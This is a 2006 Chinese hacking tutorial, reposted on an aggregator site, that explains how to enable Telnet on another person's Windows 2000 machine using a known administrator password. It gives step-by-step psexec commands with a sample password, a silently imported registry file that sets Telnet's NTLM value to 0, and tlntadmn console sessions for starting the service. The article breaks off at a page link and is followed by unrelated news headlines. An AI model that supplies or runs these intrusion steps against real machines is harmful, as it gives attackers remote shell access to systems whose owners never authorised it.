当前位置: 王朝网络 >> system >> 快速开启对方机器（win2000）的telnet服务

快速开启对方机器（win2000）的telnet服务

王朝system·作者佚名 2006-11-24

窄屏简体版字體: 小|中|大|超大

引子：某日、某天、某时间、某地点、某某人、某台机器、…

工具：psexec.exe

试验者：littleshrimp http://www.chinansl.com

条件：知道对方机器的管理员账号密码任意一个，使用psexec.exe 工具开启对方机器的telnet 服务。实践通过。

现在在网上流行的开对方机器的telnet 服务的教程有这么两种：

一、小榕的流光工具自带的一个工具系列：ntlm.exe runas.exe ……俺觉得繁琐无比：（

没有轻视小榕的意思:”）觉得小榕能写一个程序修改注册表,不简单:”)

二、.abu.写的一个快速开启对方机器的telnet 服务的一个教程。说是快，实际上不快：（

需要操作对方机器的注册表，速度奇慢无比。也没有什么XX意思:”(

三、俺自己写的一个开启对方机器telnet 服务的教程，呵呵~~不是流行的，---参考：）比较快的一种，呵呵~俺没有自夸，需要两个工具：psexec.exe、ntlm.exe。方法略:”)有更好的你难道不想用么:”)

呵呵~~对上边的开启telnet 服务的教程，做了一点评论，个人意见，仅供参考。

今天我讲的快速开启对方机器（win 2000）的telnet服务之需要一个工具即可。

PSEXEC.EXE

做一下介绍：

C:\Tools\Pstools>psexec.exe

PsExec v1.3 - execute processes remotely

www.sysinternals.com

PsExec executes a program on a remote system, where remotely executed console

applications execute interactively.

Usage: psexec \\computer [-u user [-p psswd]][-s][-i][-c [-f]][-d] cmd [argument

-u Specifies optional user name for login to remote

computer.

-p Specifies optional password for user name. If you omit this

you will be prompted to enter a hidden password.

-s Run the remote process in the System account.

-i Run the program so that it interacts with the desktop on the

remote system.

-c Copy the specified program to the remote system for

execution. If you omit this option the application

must be in the system path on the remote system.

-f Copy the specified program even if the file already

exists on the remote system.

-d Don<|>t wait for process to terminate (non-interactive).

program Name of application to execute.

arguments Arguments to pass (note that file paths must be

absolute paths on the target system).

You can enclose applications that have spaces in their name with

quotation marks e.g. psexec \\marklap "c:\long name app.exe".

Input is only passed to the remote system when you press the enter

key, and typing Ctrl-C terminates the remote process.

If you omit a user name the process will run in the context of your

account on the remote system, but will not have access to ;network

resources (because it is impersonating). Specify a valid user name

in the Domain\User syntax if the remote process requires access

to ;network resources or to run in a different account. Note that

the password is transmitted in clear text to the remote system.

C:\Tools\Pstools>

英文的，什么你不懂英文？？呵呵~自己还是慢慢摸索吧！！

这里我们运用这个命令行的两个参数-u –p 介绍一下：-u 就是对方机器的管理员的账号 –p 就是对方管理员账号的密码，如果密码为空则没有 –p 这个选项。

运行格式：psexec.exe \\对方机器的ip -u 对方机器的管理员账号 –p 对方机器的管理员账号密码 cmd （需要运行的程序）

步骤命令行下：

1、 psexec.exe \\ip -u administrator –p foolishman cmd

2、进入对方机器一般是c:\winnt\system32\〉下执行 tlntadmn.exe –呵呵~~这个是个什么程序？？Telnet 服务器管理！呵呵~~知道了？？

3、可以了，你已经知道该如何做乐：）

4、 EOF

进入对方机器后方法2:

还有一种方法就是写一个reg文件,修改ntlm的值为0或1

在dos下

c:\>copy con reg.reg

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]

"NTLM"=dword:00000000

c:\>regedit /s reg.reg 不出现确定窗口:")

c:\>;net start telnet

开启对方的telnet服务了:")很简洁是不是:")

方法1附上操作步骤:

本机运行:

D:\hack\>tlntadmn

Microsoft (R) Windows 2000 (TM) (内部版本号 2195)

Telnet Server Admin (Build 5.00.99201.1)

请在下列选项中选择一个:

0) 退出这个应用程序

1) 列出当前用户

2) 结束一个用户的会话 ...

3) 显示 / 更改注册表设置 ...

4) 开始服务

5) 停止服务

请键入一个选项的号码 [0 - 5] 以选择该选项: 3

请在下列选项中选择一个:

0) 退出这个菜单

1) AllowTrustedDomain

2) AltKeyMapping

3) DefaultDomain

4) DefaultShell

5) LoginScript

6) MaxFailedLogins

7) NTLM

8) TelnetPort

请键入一个选项的号码 [0 - 8] 以选择该选项: 7

NTLM 的当前值 = 1

您确实想更改这个值吗 ? [y/n]y

NTLM [ 当前值 = 1; 可接受的值 0、1 或 2 ] :0

您确实想将 NTLM 设置为 : 0 ? [y/n]y

只有当 Telnet 服务重新开始后设置才会生效

请在下列选项中选择一个:

0) 退出这个菜单

1) AllowTrustedDomain

2) AltKeyMapping

3) DefaultDomain

4) DefaultShell

5) LoginScript

6) MaxFailedLogins

7) NTLM

8) TelnetPort

请键入一个选项的号码 [0 - 8] 以选择该选项: 0

请在下列选项中选择一个:

0) 退出这个应用程序

1) 列出当前用户

2) 结束一个用户的会话 ...

3) 显示 / 更改注册表设置 ...

4) 开始服务

5) 停止服务

请键入一个选项的号码 [0 - 5] 以选择该选项: 4

启动 Microsoft Telnet 服务 ...

Microsoft Telnet 服务启动成功

请在下列选项中选择一个:

0) 退出这个应用程序

1) 列出当前用户

2) 结束一个用户的会话 ...

3) 显示 / 更改注册表设置 ...

4) 开始服务

5) 停止服务

请键入一个选项的号码 [0 - 5] 以选择该选项: 0

###############################################################################

对方机器上运行:

Microsoft Windows 2000 [Version 5.00.2195]

C:\WINNT\system32>tlntadmn=>回车!运行te[1] [url=http://www.chinamx.com.cn/Article/os/windows2000/200605/20060527092241_24087_2.html][2] 下一页

点击展开全文

上一篇：WIN2000作企业内部网服务器

下一篇：win2k下的批处理BAT文件运用

免责声明：本文为网络用户发布，其观点仅代表作者个人观点，与本站无关，本站仅提供信息存储服务。文中陈述内容未经本站证实，其真实性、完整性、及时性本站不作任何保证或承诺，请读者仅作参考，并请自行核实相关内容。

没有找到您想要的？点此查看更多相关文章
相关文章▶

2023年上半年GDP全球前十五强
百态 2023-10-24

美众议院议长启动对拜登的弹劾调查
百态 2023-09-13

上海、济南、武汉等多地出现不明坠落物
探索 2023-09-06

印度或要将国名改为“巴拉特”
百态 2023-09-06

男子为女友送行，买票不登机被捕
百态 2023-08-20

手机地震预警功能怎么开？
干货 2023-08-06

女子4年卖2套房花700多万做美容：不但没变美脸，面部还出现变形
百态 2023-08-04

住户一楼被水淹还冲来8头猪
百态 2023-07-31

女子体内爬出大量瓜子状活虫
百态 2023-07-25

地球连续35年收到神秘规律性信号，网友：不要回答！
探索 2023-07-21

全球镓价格本周大涨27%
探索 2023-07-09

钱都流向了那些不缺钱的人，苦都留给了能吃苦的人
探索 2023-07-02

倩女手游刀客魅者强控制（强混乱强眩晕强睡眠）和对应控制抗性的关系
百态 2020-08-20

美国5月9日最新疫情：美国确诊人数突破131万
百态 2020-05-09

荷兰政府宣布将集体辞职
干货 2020-04-30

倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观：鹏程万里
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案神机营：射石饮羽
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山：拔刀相助
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案天工阁：鬼斧神工
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道：单枪匹马
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野：与虎谋皮
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野：李代桃僵
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野：指鹿为马
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案金陵：小鸟依人
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案金陵：千金买邻
干货 2019-11-12